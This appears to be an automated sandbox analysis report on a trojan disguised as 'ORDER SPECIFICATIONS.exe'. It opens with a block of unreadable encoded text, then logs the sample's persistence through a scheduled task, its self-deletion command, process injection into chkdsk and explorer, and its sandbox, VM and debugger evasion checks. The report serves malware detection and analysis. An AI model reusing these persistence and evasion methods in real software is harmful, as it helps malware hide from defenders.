9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
            Source: classification engineClassification label: mal100.troj.evad.winEXE@12/4@12/8
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Roaming\LvZiFDk.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_01
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Local\Temp\tmpDA15.tmpJump to behavior
            Source: ORDER SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: ORDER SPECIFICATIONS.exeVirustotal: Detection: 30%
            Source: ORDER SPECIFICATIONS.exeReversingLabs: Detection: 14%
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile read: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: unknownProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: ORDER SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ORDER SPECIFICATIONS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: chkdsk.pdbGCTL source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
            Source: Binary string: chkdsk.pdb source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298571038.00000000015BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: ORDER SPECIFICATIONS.exe, chkdsk.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: ORDER SPECIFICATIONS.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: LvZiFDk.exe.0.dr, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041C9A6 pushfd ; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00407206 push es; retf
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041B3F2 push eax; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041B3FB push eax; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041B3A5 push eax; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041B45C push eax; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0040CC22 pushad ; retf
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00415597 push ss; retf
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0040B6F8 push ecx; ret
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0151D0D1 push ecx; ret
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE1EFD push esp; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE0268 push ecx; ret
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE2C56 push ebp; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE4657 push esi; iretd
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE2E40 push es; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE0621 push edx; iretd
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE4FDA pushad ; ret
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE29CB push edx; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE295D push edx; retf
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE015B push ebp; iretd
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE2556 push 9A36B996h; iretd
            Source: C:\Windows\explorer.exeCode function: 7_2_06FE1F37 push edx; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0559D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBC9A6 pushfd ; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BA7206 push es; retf
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBB3A5 push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBB3FB push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBB3F2 push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BACC22 pushad ; retf
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBB45C push eax; ret
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BB5597 push ss; retf
            Source: initial sampleStatic PE information: section name: .text entropy: 7.43400315564
            Source: initial sampleStatic PE information: section name: .text entropy: 7.43400315564
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Roaming\LvZiFDk.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ORDER SPECIFICATIONS.exe PID: 6336, type: MEMORY
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.2b26b2c.1.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000BA85E4 second address: 0000000000BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000BA896E second address: 0000000000BA8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe TID: 6340Thread sleep time: -102106s >= -30000s
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe TID: 6356Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 5848Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 768Thread sleep time: -44000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
            Source: explorer.exe, 00000007.00000000.278443564.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000002.504681708.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000002.504750935.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000007.00000000.259001447.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000007.00000000.278684263.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000007.00000002.511293528.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000007.00000000.278684263.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000007.00000000.277633777.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00409B10 LdrLoadDll,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015541E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015469A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01582073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01591074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01547016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01547016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01547016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01594015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01594015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
